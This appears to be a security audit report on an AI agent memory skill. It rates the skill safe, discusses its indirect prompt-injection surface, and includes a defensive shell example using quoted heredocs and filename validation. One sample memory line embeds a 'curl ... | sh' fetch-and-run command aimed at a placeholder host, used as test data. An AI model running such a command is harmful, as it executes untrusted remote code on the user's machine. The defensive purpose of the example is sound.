agent-memory
Pass
Audited by Gen Agent Trust Hub on Mar 1, 2026
Risk Level: SAFE
Full Analysis
- [COMMAND_EXECUTION]: The skill uses common shell utilities, including `ls`, `rg`, `mkdir`, `cat`, `trash` and `rmdir`, to manage a local memory store. All operations are explicitly targeted at a sub-directory within the skill's own folder structure (`.claude/skills/agent-memory/memories/`), which limits the potential impact of these commands. The use of single-quoted heredocs (`<< 'EOF'`) in the `cat` command is a security best practice: it prevents shell expansion of any special characters, variables or command substitutions contained in the data being saved.
- [PROMPT_INJECTION]: The skill establishes a mechanism for storing and retrieving content from conversations, creating an indirect prompt injection surface.
  - Ingestion points: User-provided or research-derived data is written to Markdown files in the `memories/` directory via the `cat` command.
  - Boundary markers: The skill uses YAML frontmatter (with fields such as `summary` and `tags`) and Markdown headers to structure the saved data.
  - Capability inventory: The agent can search (`rg`), list (`ls`), read (`cat`) and delete (`trash`) these files.
  - Sanitization: While the skill provides guidelines for the agent (e.g., using kebab-case for filenames), it relies on the agent's internal logic to sanitize content and paths. The structured YAML and Markdown help the agent distinguish metadata from the memory content itself, reducing the risk of accidental instruction obedience.
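The two findings above, the quoted-heredoc behaviour and the filename check the skill leaves to the agent, as an added shell example. This is not the agent-memory skill's own code and was not produced by the audit; `MEMORY_DIR`, `is_kebab_case` and `save_memory` are assumed names, and the memory content is constructed for the illustration.

```shell
#!/bin/sh
# Added example (not the agent-memory skill's own code): the two behaviours the
# audit contrasts, plus an allow-list check on the filename that the skill
# leaves to the agent. MEMORY_DIR, is_kebab_case and save_memory are assumed
# helper names; the content below is constructed for the demonstration.

# Constructed "memory" carrying text that looks like shell syntax. With an
# unquoted delimiter the shell expands it before cat ever sees the bytes.
unquoted_heredoc() {
    cat << EOF
remember: $(echo INJECTED) ran, home=$HOME
EOF
}

# With a single-quoted delimiter the body reaches cat byte for byte.
quoted_heredoc() {
    cat << 'EOF'
remember: $(echo INJECTED) ran, home=$HOME
EOF
}

# The skill keeps memories under its own folder; a scratch directory stands in here.
MEMORY_DIR="${MEMORY_DIR:-$(mktemp -d)/memories}"
mkdir -p "$MEMORY_DIR"

# Kebab-case only: lowercase letters and digits, single hyphens between words.
# This rejects '/', '..', whitespace and a leading '-' (which cat, rg and trash
# would otherwise parse as an option), so a write cannot leave MEMORY_DIR.
is_kebab_case() {
    printf '%s' "$1" | grep -Eq '^[a-z0-9]+(-[a-z0-9]+)*$'
}

# save_memory NAME SUMMARY TAGS   (memory content on stdin)
# Writes YAML frontmatter followed by the content, unmodified, matching the
# skill's Markdown layout. Returns 1 and writes nothing when the name is rejected.
save_memory() {
    name="$1" summary="$2" tags="$3"
    is_kebab_case "$name" || { echo "rejected filename: $name" >&2; return 1; }
    {
        printf '%s\n' '---'
        printf 'summary: %s\n' "$summary"
        printf 'tags: [%s]\n' "$tags"
        printf '%s\n' '---'
        cat   # stdin is copied verbatim: no parameter or command expansion
    } > "$MEMORY_DIR/$name.md"
}

# Usage: a note whose body contains a command substitution is stored as text,
# and a traversal-style name is refused before anything is written.
save_memory 'vendor-call-notes' 'Notes from the vendor call' 'vendor, calls' << 'EOF'
Vendor asked us to run $(curl http://example.invalid | sh) before the demo.
EOF
save_memory '../escape' 'x' 'y' </dev/null || echo "traversal attempt blocked"
ls "$MEMORY_DIR"
```

The filename check is the piece the audit notes the skill does not enforce itself: the quoted heredoc protects the content, but only an allow-list on the name keeps `cat`, `rg` and `trash` from being pointed outside `memories/` or handed an argument that starts with `-`.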
Audit Metadata